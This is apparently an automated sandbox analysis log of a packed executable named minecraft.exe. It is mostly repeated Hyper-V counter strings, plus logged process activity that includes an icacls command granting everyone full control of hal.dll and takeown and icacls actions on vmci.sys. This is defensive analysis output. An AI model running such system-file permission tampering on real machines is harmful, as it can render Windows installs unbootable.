Source: Binary string: AcroExch.PDBookmark9o source: reg.exe, 0000001F.00000003.1511553346.000001B6128F4000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,0_2_000000014000D9C4
Source: C:\Users\user\Desktop\minecraft.exeCode function: 0_2_000000014001BD3E push rbx; ret 0_2_000000014001BD3F
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
Source: C:\Users\user\Desktop\minecraft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlrmdr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlrmdr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wlrmdr.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\icacls.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\regedit.exeJump to behavior
Source: C:\Windows\System32\icacls.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\Jump to behavior
Source: C:\Windows\System32\icacls.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sys
Source: C:\Windows\System32\takeown.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sys\Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exeWindow / User API: threadDelayed 1111Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exe TID: 7800Thread sleep count: 1111 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Temp\5B39.tmpJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmp\5B3B.tmpJump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\minecraft.exeFile opened: C:\Users\user\AppData\Local\Temp\5B39.tmp\5B3A.tmpJump to behavior
Source: reg.exe, 0000001F.00000003.1637357696.000001B612938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: icacls.exe, 0000001A.00000002.1368697338.0000020B3AB68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ss.svmci.syswfplwfs.sys|
Source: reg.exe, 0000001F.00000002.1703813992.000001B6130E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: reg.exe, 0000001F.00000003.1637702977.000001B6129B3000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1637552222.000001B6129B3000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1650293185.000001B6129B3000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1650180786.000001B6129B3000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1653919411.000001B6129B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860I
Source: reg.exe, 0000001F.00000003.1619667936.000001B612AE9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1619739375.000001B612AE9000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1619450996.000001B612AE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wow64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_none_e952b570e43ce35d]
Source: reg.exe, 0000001F.00000003.1618715337.000001B613195000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_none_40a51070cee1599dJ
Source: reg.exe, 0000001F.00000003.1642699891.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1702491171.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000002.1703470418.000001B6128F2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1645615414.000001B6128F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: reg.exe, 0000001F.00000003.1637357696.000001B612938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: reg.exe, 0000001F.00000003.1650726939.000001B61293F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1653872870.000001B612937000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1654592459.000001B61293F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1649920740.000001B612937000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1653675330.000001B61293F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot<
Source: reg.exe, 0000001F.00000003.1653675330.000001B612937000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cessor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Accesses Cost5036Page Fault Intercepts/sec5038Page Fault Intercepts Cost5040NMI Interrupts/sec50
Source: reg.exe, 0000001F.00000003.1642699891.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1702491171.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000002.1703470418.000001B6128F2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1645615414.000001B6128F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: reg.exe, 0000001F.00000003.1650726939.000001B61293F000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1653872870.000001B612937000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1654592459.000001B61293F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time483
Source: reg.exe, 0000001F.00000003.1642699891.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1702491171.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000002.1703470418.000001B6128F2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1645615414.000001B6128F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorL
Source: reg.exe, 0000001F.00000003.1629317924.000001B61292F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Pro
Source: reg.exe, 0000001F.00000003.1642699891.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1702491171.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000002.1703470418.000001B6128F2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1645615414.000001B6128F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dkytrhgcwserdbb Bus
Source: reg.exe, 0000001F.00000002.1703813992.000001B6130E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid PartitionZl
Source: reg.exe, 0000001F.00000003.1653803745.000001B612989000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1650028322.000001B612989000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost8
Source: reg.exe, 0000001F.00000003.1642699891.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1702491171.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000002.1703470418.000001B6128F2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1645615414.000001B6128F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processorh
Source: reg.exe, 0000001F.00000003.1642699891.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1702491171.000001B6128F1000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000002.1703470418.000001B6128F2000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1645615414.000001B6128F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dkytrhgcwserdbb Bus Pipes
Source: reg.exe, 0000001F.00000003.1637874283.000001B61293B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: icacls.exe, 0000001A.00000003.1363981605.0000020B3AB77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmci.sys`
Source: reg.exe, 0000001F.00000003.1632040995.000001B61297B000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1632636687.000001B612966000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1632839017.000001B61296A000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1632877087.000001B612979000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitionys
Source: reg.exe, 0000001F.00000003.1649920740.000001B612937000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 0000001F.00000003.1653675330.000001B61293F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: C:\Windows\System32\wlrmdr.exeProcess information queried: ProcessInformation
